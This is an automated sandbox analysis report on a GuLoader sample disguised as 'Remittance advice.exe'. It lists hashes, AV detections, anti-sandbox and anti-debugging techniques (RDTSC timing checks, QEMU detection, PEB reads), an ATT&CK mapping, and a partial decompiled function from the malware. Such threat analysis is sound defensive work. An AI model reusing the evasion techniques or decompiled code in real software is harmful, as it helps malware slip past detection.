Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Remittance advice.exe

Overview

General Information

Sample Name:Remittance advice.exe
Analysis ID:343219
MD5:e6f8850e7f37364f9a9fac18601b9244
SHA1:9158c69b6ca0ffca566d9689fb140b4973203fa0
SHA256:275de12bf065d99796babc9844c4e3198645a82259c4999d13d8a14c18482358
Tags:exeGuLoader

Most interesting Screenshot:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found potential dummy code loops (likely to delay analysis)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • Remittance advice.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\Remittance advice.exe' MD5: E6F8850E7F37364F9A9FAC18601B9244)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Remittance advice.exe PID: 6336JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: Remittance advice.exe PID: 6336JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Remittance advice.exeVirustotal: Detection: 45%Perma Link
      Source: Remittance advice.exeReversingLabs: Detection: 36%

      Compliance:

      barindex
      Uses 32bit PE filesShow sources
      Source: Remittance advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 4x nop then lfence 0_2_0040425D
      Source: Remittance advice.exe, 00000000.00000002.1328575340.000000000067A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: C:\Users\user\Desktop\Remittance advice.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00405DCE0_2_00405DCE
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00406E030_2_00406E03
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00406EE20_2_00406EE2
      Source: Remittance advice.exe, 00000000.00000002.1327563785.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameEnantiopathia6.exe vs Remittance advice.exe
      Source: Remittance advice.exe, 00000000.00000002.1329075986.0000000002230000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Remittance advice.exe
      Source: Remittance advice.exeBinary or memory string: OriginalFilenameEnantiopathia6.exe vs Remittance advice.exe
      Source: Remittance advice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal72.troj.evad.winEXE@1/0@0/0
      Source: C:\Users\user\Desktop\Remittance advice.exeFile created: C:\Users\user\AppData\Local\Temp\~DFACCDFEC25FC090FE.TMPJump to behavior
      Source: Remittance advice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Remittance advice.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\Remittance advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Remittance advice.exeVirustotal: Detection: 45%
      Source: Remittance advice.exeReversingLabs: Detection: 36%

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: Remittance advice.exe PID: 6336, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Remittance advice.exe PID: 6336, type: MEMORY
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040182E push edi; iretd 0_2_0040182F
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040882E push ds; ret 0_2_0040884D
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004020D6 push edi; iretd 0_2_004020D7
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00408152 push es; iretd 0_2_00408154
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040B10A push es; iretd 0_2_0040B22C
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00409120 push es; iretd 0_2_00409124
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004081CC push es; iretd 0_2_004081D8
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004092C9 push es; iretd 0_2_004092CC
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00408AE9 pushad ; ret 0_2_00408B20
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A37F push es; iretd 0_2_0040A380
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00408B2E push ecx; iretd 0_2_00408B34
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A381 push es; iretd 0_2_0040A390
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A391 push es; iretd 0_2_0040A3A0
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00409393 push es; ret 0_2_00409398
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A3A1 push es; iretd 0_2_0040A3B0
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004093B2 push es; iretd 0_2_004094E4
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00409C7F pushad ; ret 0_2_00409C80
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00409C36 push es; ret 0_2_00409C3C
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A4C6 push es; iretd 0_2_0040A4C8
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00409CDA push es; ret 0_2_00409D4C
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A4E6 push es; ret 0_2_0040A554
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004094E8 push es; iretd 0_2_004094F0
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A566 push es; iretd 0_2_0040A5A4
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A532 push es; ret 0_2_0040A554
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A532 push es; iretd 0_2_0040A5A4
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A532 push es; ret 0_2_0040A614
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004085F1 pushad ; ret 0_2_004085F4
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_0040A5B2 push es; ret 0_2_0040A614
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00408DB8 push cs; iretd 0_2_00408DBC
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004056C2 push ss; retf 0_2_004056C3
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00409E9C pushfd ; retf 0_2_00409E9D
      Source: C:\Users\user\Desktop\Remittance advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Remittance advice.exe, 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEF
      Source: Remittance advice.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Remittance advice.exeRDTSC instruction interceptor: First address: 0000000000403F92 second address: 0000000000403F92 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 dec edi 0x00000004 jmp 00007F5D84D1C3D7h 0x00000006 cmp edi, 00000000h 0x00000009 jne 00007F5D84D1C393h 0x0000000b pushad 0x0000000c jmp 00007F5D84D1C3CEh 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00403D4F rdtsc 0_2_00403D4F
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: Remittance advice.exe, 00000000.00000002.1327620350.0000000000460000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exef
      Source: Remittance advice.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

      Anti Debugging:

      barindex
      Found potential dummy code loops (likely to delay analysis)Show sources
      Source: C:\Users\user\Desktop\Remittance advice.exeProcess Stats: CPU usage > 90% for more than 60s
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00403D4F rdtsc 0_2_00403D4F
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00461068 mov eax, dword ptr fs:[00000030h]0_2_00461068
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004632FE mov eax, dword ptr fs:[00000030h]0_2_004632FE
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004613DF mov eax, dword ptr fs:[00000030h]0_2_004613DF
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00463D88 mov eax, dword ptr fs:[00000030h]0_2_00463D88
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00463D97 mov eax, dword ptr fs:[00000030h]0_2_00463D97
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_00461E88 mov eax, dword ptr fs:[00000030h]0_2_00461E88
      Source: C:\Users\user\Desktop\Remittance advice.exeCode function: 0_2_004637AD mov eax, dword ptr fs:[00000030h]0_2_004637AD
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: Remittance advice.exe, 00000000.00000002.1328805905.0000000000D00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: Remittance advice.exe, 00000000.00000002.1328805905.0000000000D00000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: Remittance advice.exe, 00000000.00000002.1328805905.0000000000D00000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
      Source: Remittance advice.exe, 00000000.00000002.1328805905.0000000000D00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
      Source: Remittance advice.exe, 00000000.00000002.1328805905.0000000000D00000.00000002.00000001.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Virtualization/Sandbox Evasion11Input Capture1Security Software Discovery311Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Information Discovery11Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Remittance advice.exe45%VirustotalBrowse
      Remittance advice.exe37%ReversingLabsWin32.Trojan.Generic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:31.0.0 Red Diamond
      Analysis ID:343219
      Start date:22.01.2021
      Start time:15:37:59
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 11m 42s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Remittance advice.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:38
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.troj.evad.winEXE@1/0@0/0
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 8.7% (good quality ratio 1.6%)
      • Quality average: 10.4%
      • Quality standard deviation: 22.1%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .exe
      • Override analysis time to 240s for sample files taking high CPU consumption
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.148990254252083
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.15%
      • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:Remittance advice.exe
      File size:94208
      MD5:e6f8850e7f37364f9a9fac18601b9244
      SHA1:9158c69b6ca0ffca566d9689fb140b4973203fa0
      SHA256:275de12bf065d99796babc9844c4e3198645a82259c4999d13d8a14c18482358
      SHA512:c10139d4dc069466bfd0a769447025aaf177c8c8457ae82bdd0c73306b0d8345719f248302ce38def12a2fc54ca44694e5be12d0a1b6ce3fdf4cf1f61a814eaf
      SSDEEP:768:HwRs24AMpfDW9f9Q6XZu8MkrRwKgSovzRC4gUxP1+coOdMYrflBneMzxk0NHHtyG:L2qoDXZu0qKtzKgcoOCYr9B4tclP4nU
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.....................................Rich....................PE..L......V.................@...0......P........P....@........

      File Icon

      Icon Hash:00649090b8b0cdf0

      Static PE Info

      General

      Entrypoint:0x401450
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      DLL Characteristics:
      Time Stamp:0x56B005AF [Tue Feb 2 01:26:07 2016 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:9274ae9f8b107fede7241921f858c268

      Entrypoint Preview

      Instruction
      push 00402470h
      call 00007F5D84D93F55h
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      xor byte ptr [eax], al
      add byte ptr [eax], al
      inc eax
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add al, dl
      cdq
      lea ebp, dword ptr [ebp-64h]
      fidivr word ptr [edi]
      inc esi
      mov cl, ch
      lds eax, ecx
      dec esp
      test dword ptr [esi], 0000003Bh
      add byte ptr [eax], al
      add byte ptr [ecx], al
      add byte ptr [eax], al
      add byte ptr [ecx+00h], al
      pop es
      inc ecx
      add byte ptr [eax+52h], dl
      dec edi
      push edx
      inc ecx
      push esp
      dec ecx
      dec edi
      dec esi
      push ebx
      add byte ptr [eax], al
      loopne 00007F5D84D93F15h
      push cs
      add eax, dword ptr [eax]
      add byte ptr [eax], al
      add bh, bh
      int3
      xor dword ptr [eax], eax
      push es
      jne 00007F5D84D93FB9h
      pushad
      dec edx
      lahf
      mov byte ptr [BEB7419Eh], al

      Data Directories

      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x145040x28.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000xf22.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
      IMAGE_DIRECTORY_ENTRY_IAT0x10000x124.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

      Sections

      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x10000x139ec0x14000False0.370349121094data6.59143685253IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      .data0x150000x14c00x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
      .rsrc0x170000xf220x1000False0.357421875data3.44984565593IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

      Resources

      NameRVASizeTypeLanguageCountry
      RT_ICON0x17c3a0x2e8data
      RT_ICON0x173920x8a8data
      RT_GROUP_ICON0x173700x22data
      RT_VERSION0x171200x250data

      Imports

      DLLImport
      MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

      Version Infos

      DescriptionData
      Translation0x0400 0x04b0
      InternalNameEnantiopathia6
      FileVersion1.00
      CompanyNameVar map
      CommentsVar map
      ProductNameVar map
      ProductVersion1.00
      OriginalFilenameEnantiopathia6.exe

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      System Behavior

      Analysis Process: Remittance advice.exe PID: 6336 Parent PID: 5684

      General

      Start time:15:38:53
      Start date:22/01/2021
      Path:C:\Users\user\Desktop\Remittance advice.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\Remittance advice.exe'
      Imagebase:0x400000
      File size:94208 bytes
      MD5 hash:E6F8850E7F37364F9A9FAC18601B9244
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Reputation:low

      Chronological Activities

      Disassembly

      Code Analysis

      Reset < >

        Analysis Process: Remittance advice.exe PID: 6336 Parent PID: 5684 Remittance advice.exeCOMMON

        Executed Functions

        Function 0040E204, Relevance: 299.5, APIs: 161, Strings: 9, Instructions: 1975COMMON
        Download Yara Rule
        C-Code - Quality: 57%
        			E0040E204(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				long long* _v16;
				long long _v32;
				char _v36;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				short _v64;
				short _v68;
				signed int _v72;
				signed int _v76;
				char _v80;
				char _v84;
				signed int _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				char _v112;
				char _v120;
				intOrPtr _v128;
				char _v136;
				char _v144;
				char _v152;
				char _v160;
				char _v168;
				char* _v176;
				char _v184;
				char* _v192;
				intOrPtr _v200;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v280;
				char _v288;
				char _v296;
				intOrPtr _v300;
				char _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				intOrPtr* _v332;
				signed int _v336;
				intOrPtr* _v340;
				signed int _v344;
				intOrPtr* _v348;
				signed int _v352;
				signed int _v356;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				intOrPtr* _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				intOrPtr* _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				intOrPtr* _v496;
				signed int _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				char _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				intOrPtr* _v540;
				signed int _v544;
				intOrPtr* _v548;
				signed int _v552;
				intOrPtr* _v556;
				signed int _v560;
				intOrPtr* _v564;
				signed int _v568;
				intOrPtr* _v572;
				signed int _v576;
				intOrPtr* _v580;
				signed int _v584;
				intOrPtr* _v588;
				signed int _v592;
				intOrPtr* _v596;
				signed int _v600;
				intOrPtr* _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr* _v620;
				signed int _v624;
				intOrPtr* _v628;
				signed int _v632;
				intOrPtr* _v636;
				signed int _v640;
				intOrPtr* _v644;
				signed int _v648;
				intOrPtr* _v652;
				signed int _v656;
				intOrPtr* _v660;
				signed int _v664;
				intOrPtr* _v668;
				signed int _v672;
				intOrPtr* _v676;
				signed int _v680;
				signed int _v684;
				signed char _t972;
				signed int _t979;
				signed int _t983;
				char* _t985;
				signed int _t993;
				signed int _t1001;
				signed int _t1005;
				signed int _t1010;
				signed int _t1014;
				signed int _t1018;
				signed int _t1022;
				char* _t1026;
				signed int _t1030;
				char* _t1036;
				signed int _t1053;
				signed int _t1057;
				signed int _t1063;
				signed int _t1067;
				signed int _t1071;
				signed int _t1075;
				signed int _t1079;
				signed int _t1083;
				signed int _t1087;
				char* _t1091;
				signed int _t1095;
				signed int _t1122;
				signed int _t1126;
				signed int _t1131;
				signed int _t1135;
				char* _t1138;
				signed int _t1141;
				signed int _t1150;
				signed int _t1154;
				signed int _t1158;
				signed int _t1162;
				signed int _t1166;
				signed int _t1170;
				char* _t1175;
				signed int _t1179;
				char* _t1180;
				signed int _t1203;
				signed int _t1207;
				signed int _t1211;
				signed int _t1215;
				signed int _t1219;
				signed int _t1223;
				signed int _t1237;
				signed int _t1241;
				signed int _t1245;
				signed int _t1249;
				signed int _t1253;
				signed int _t1257;
				char* _t1261;
				signed int _t1265;
				char* _t1269;
				signed int _t1273;
				signed int* _t1277;
				signed int _t1281;
				signed int _t1294;
				signed int _t1304;
				signed int _t1308;
				signed int _t1312;
				signed int _t1324;
				signed int _t1328;
				signed int _t1332;
				signed int _t1336;
				signed int _t1340;
				signed int _t1344;
				char* _t1348;
				signed int _t1352;
				signed int _t1368;
				signed int _t1372;
				signed int _t1377;
				signed int _t1381;
				signed int _t1385;
				signed int _t1389;
				char* _t1393;
				signed int _t1404;
				char* _t1412;
				void* _t1416;
				intOrPtr _t1442;
				signed int* _t1509;
				signed int* _t1515;
				char* _t1530;
				signed int* _t1542;
				void* _t1565;
				void* _t1567;
				long long* _t1568;
				void* _t1569;
				void* _t1570;
				intOrPtr* _t1571;
				void* _t1573;
				void* _t1576;
				void* _t1577;
				void* _t1579;
				void* _t1580;
				void* _t1582;
				long long* _t1583;
				long long* _t1584;
				void* _t1585;
				char** _t1586;
				char* _t1686;

				_t1568 = _t1567 - 0xc;
				 *[fs:0x0] = _t1568;
				L004012A0();
				_v16 = _t1568;
				_v12 = 0x401190;
				_v8 = _a4 & 0x00000001;
				_t972 = _a4 & 0x000000fe;
				_a4 = _t972;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t1565);
				asm("fldz");
				 *_t1568 = __fp0;
				L0040142C();
				L00401432();
				asm("fcomp qword [0x401188]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t972 != 0) {
					_v160 = 0x80020004;
					_v168 = 0xa;
					_v144 = 0x80020004;
					_v152 = 0xa;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_v176 = L"SVANGREHJEMMENES";
					_v184 = 8;
					L00401420();
					_push( &_v168);
					_push( &_v152);
					_push( &_v136);
					_push(0);
					_push( &_v120);
					L00401426();
					_push( &_v168);
					_push( &_v152);
					_push( &_v136);
					_push( &_v120);
					_push(4);
					L0040141A();
					_t1568 = _t1568 + 0x14;
				}
				if( *0x415010 != 0) {
					_v400 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v400 = 0x415010;
				}
				_t979 =  &_v84;
				L0040140E();
				_v308 = _t979;
				_t983 =  *((intOrPtr*)( *_v308 + 0x168))(_v308,  &_v88, _t979,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x30c))( *_v400));
				asm("fclex");
				_v312 = _t983;
				if(_v312 >= 0) {
					_v404 = _v404 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x4034ec);
					_push(_v308);
					_push(_v312);
					L00401402();
					_v404 = _t983;
				}
				L00401414();
				_t1569 = _t1568 + 0x10;
				_v296 =  *0x401180;
				_v288 =  *0x401178;
				_v280 =  *0x401170;
				_t985 =  &_v120;
				L004013FC();
				_v248 = _t985;
				_t993 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v248,  &_v280,  &_v288,  &_v296,  &_v304, _t985,  &_v120, _v88, 0, 0);
				_v316 = _t993;
				if(_v316 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x403360);
					_push(_a4);
					_push(_v316);
					L00401402();
					_v408 = _t993;
				}
				_v60 = _v304;
				_v56 = _v300;
				_push( &_v88);
				_push( &_v84);
				_push(2);
				L004013F6();
				_t1570 = _t1569 + 0xc;
				L004013F0();
				if( *0x415010 != 0) {
					_v412 = 0x415010;
				} else {
					_push(0x415010);
					_push(0x402aa4);
					L00401408();
					_v412 = 0x415010;
				}
				_t1001 =  &_v84;
				L0040140E();
				_v308 = _t1001;
